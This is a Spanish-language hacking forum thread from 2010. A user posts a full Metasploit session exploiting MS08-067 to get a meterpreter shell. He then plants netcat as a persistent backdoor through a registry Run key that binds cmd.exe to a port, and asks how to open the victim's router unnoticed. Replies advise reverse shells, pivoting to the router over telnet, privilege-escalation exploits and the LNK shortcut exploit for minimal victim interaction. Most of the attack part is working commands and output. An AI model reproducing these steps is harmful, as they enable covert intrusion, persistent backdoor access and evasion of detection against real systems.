Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: Debci en 31 Julio 2010, 11:17 am



Título: Duda sobre re-crear aceso a mi Backdoor
Publicado por: Debci en 31 Julio 2010, 11:17 am
Hola a todos, recientemente practicando PenTest con un equipo remoto (es mio si...) consegui explotarle una vulnerabilidad y bindearme a una reverse tcp meterpreter, una vez en su equipo, me dispuse a asegurarme el aceso, lo hice de la siguiente manera (basandome en lo que Kamsky explicó):

 
Código:
               ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##


       =[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7808 updated 7 days ago (2009.12.10)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST xx.xx.xx.xx
RHOST => xx.xx.xx.xx
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.0.3      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     xx.xx.xx.xx      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > exploit[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish[*] Selected Target: Windows XP SP2 Spanish (NX)[*] Triggering the vulnerability...[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (xx.xx.xx.xx:1934 -> xx.xx.xx.xx:4444)

meterpreter >

Una vez dentro me dispuse a subir el netcat.exe y ponerlo con la shell en un puerto y escribirlo en el registro:

Código:
meterpreter > upload /root/tools/nc.exe C:\\Windows\\System32\\
[*] uploading  : /root/tools/nc.exe -> C:\Windows\System32\
[*] uploaded   :  /root/tools/nc.exe-> C:\Windows\System32\\nc.exe
meterpreter >

Una vez subido y que se puede ejecutar en la consola sin ruta especifica:

Código:
meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v WindowsCore -d 'C:\Windows\System32\nc.exe -L -d -p 1234 -e cmd.exe'
Successful set Hacked.
meterpreter >

Lo pondrá a la espera en el puerto 1234, pero si ese puerto no esta mapeado en el router como diablos voy a conectarme a la backdoor?Puedo de alguna manera abrir puertos en su router? Estuve pensando en subirle un servidor VNC pero es muy cutre, y se daria cuenta de que estan trasteando(en el caso de que fuese una situación real...).

A expensas de que muchos van a decir que como es tu router abrelos tu, les diré que en una situación real no se puede hacer eso, y quiero hacerlo todo como si una real se tratase!

Saludos y gracias a todos!


Título: Re: Duda sobre re-crear aceso a mi Backdoor
Publicado por: kamsky en 31 Julio 2010, 12:36 pm
si tienes acceso al PC, salta desde este a la conf del router y abre los puertos, no deberías de tener muchos problemas, otra opción es una reverse shell, que sea la víctima la que se conecte a tí


Título: Re: Duda sobre re-crear aceso a mi Backdoor
Publicado por: Debci en 31 Julio 2010, 12:43 pm
si tienes acceso al PC, salta desde este a la conf del router y abre los puertos, no deberías de tener muchos problemas, otra opción es una reverse shell, que sea la víctima la que se conecte a tí
asi lo he intentado pero ahora mi supuesta victima no tengo permisos de administracion :S
Ni puedo escribir registro ni nada (lo del reverse ya he visto que puedo, es efectivo)
Y con lo que se no puedo escalar privilegios remotamente...

Alguna idea?

Saludos


Título: Re: Duda sobre re-crear aceso a mi Backdoor
Publicado por: kamsky en 31 Julio 2010, 12:46 pm
tienes acceso al router desde el PC??

busca bugs en windows recientes que te permitan escalar privilegios, últimamente hay bastantes ;)


Título: Re: Duda sobre re-crear aceso a mi Backdoor
Publicado por: Debci en 31 Julio 2010, 12:49 pm
tienes acceso al router desde el PC??

busca bugs en windows recientes que te permitan escalar privilegios, últimamente hay bastantes ;)
Bien me pongo a ello, aceso al router? Mmm desde consola?

Saludos


Título: Re: Duda sobre re-crear aceso a mi Backdoor
Publicado por: kamsky en 31 Julio 2010, 12:52 pm
si, suele haber acceso por telnet a los routers, una vez que te logues tendrás un menú parecido al que te sale por Web, en mi caso este:

   Main Menu

1.  ADSL Link State
2.  LAN
3.  WAN
4.  DNS Server
5.  Route Setup
6.  NAT
7.  Firewall
8.  Quality Of Service
9.  Management
10. Passwords
11. Reset to Default
12. Save and Reboot
13. Exit
 ->


Título: Re: Duda sobre re-crear aceso a mi Backdoor
Publicado por: Debci en 31 Julio 2010, 12:58 pm
si, suele haber acceso por telnet a los routers, una vez que te logues tendrás un menú parecido al que te sale por Web, en mi caso este:

   Main Menu

1.  ADSL Link State
2.  LAN
3.  WAN
4.  DNS Server
5.  Route Setup
6.  NAT
7.  Firewall
8.  Quality Of Service
9.  Management
10. Passwords
11. Reset to Default
12. Save and Reboot
13. Exit
 ->

Entiendo...
EDITO:
Le hago una conexion a la puerta de enlace del router?
Ahora he buscado exploits para escalar privilegios, he leido sobre el ms10_15 pero no hay nada especifico sobre el, solamente lo que hace...
He visto metodos, pero tendria que tener aceso fisico al pc para escalarlos, otra posibilidad es crackear la pass de admin pero si me deslogueo por consola pierdo conexion con el meterpreter.

He pensado que en una situacion real se podria hacer con ingenieria social, pero descarto dicha posiblidad.

Saludos


Título: Re: Duda sobre re-crear aceso a mi Backdoor
Publicado por: kamsky en 31 Julio 2010, 13:03 pm
http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=windows&filter_author=&filter_platform=45&filter_type=0&filter_port=&filter_osvdb=&filter_cve=


Título: Re: Duda sobre re-crear aceso a mi Backdoor
Publicado por: Debci en 31 Julio 2010, 13:09 pm
http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=windows&filter_author=&filter_platform=45&filter_type=0&filter_port=&filter_osvdb=&filter_cve=
O soy muy inutil o no veo ninguno de escala de privilegios xD
El de lnk code execution lo he leido pero no hay exploit, y no es intencion opcodearlo sobre la marcha...

Saludos


Título: Re: Duda sobre re-crear aceso a mi Backdoor
Publicado por: kamsky en 31 Julio 2010, 13:18 pm
http://www.exploit-db.com/exploits/14403/


Título: Re: Duda sobre re-crear aceso a mi Backdoor
Publicado por: Debci en 31 Julio 2010, 14:04 pm
http://www.exploit-db.com/exploits/14403/
Mi victima tendria que clicar el aceso directo? Y que conseguiré con eso? Shell de system?

Saludos


Título: Re: Duda sobre re-crear aceso a mi Backdoor
Publicado por: [L]ord [R]NA en 1 Agosto 2010, 08:05 am
segun tengo entendido esa vulnerabilidad funciona automaticamente el usuario entra en la carpeta donde esta el acceso directo, por lo tanto la interaccion del usuario para la explotacion es minima... mas aun si colocas el acceso directo desde un principio en el escritorio.


Título: Re: Duda sobre re-crear aceso a mi Backdoor
Publicado por: Debci en 1 Agosto 2010, 10:02 am
segun tengo entendido esa vulnerabilidad funciona automaticamente el usuario entra en la carpeta donde esta el acceso directo, por lo tanto la interaccion del usuario para la explotacion es minima... mas aun si colocas el acceso directo desde un principio en el escritorio.
Pero no se si es que me devuelve una shell, o que hace el payload, porque alomejor hay que añadir algo.
Saludos